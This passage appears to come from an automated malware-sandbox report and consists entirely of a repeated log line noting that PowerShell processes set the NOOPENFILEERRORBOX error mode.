      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
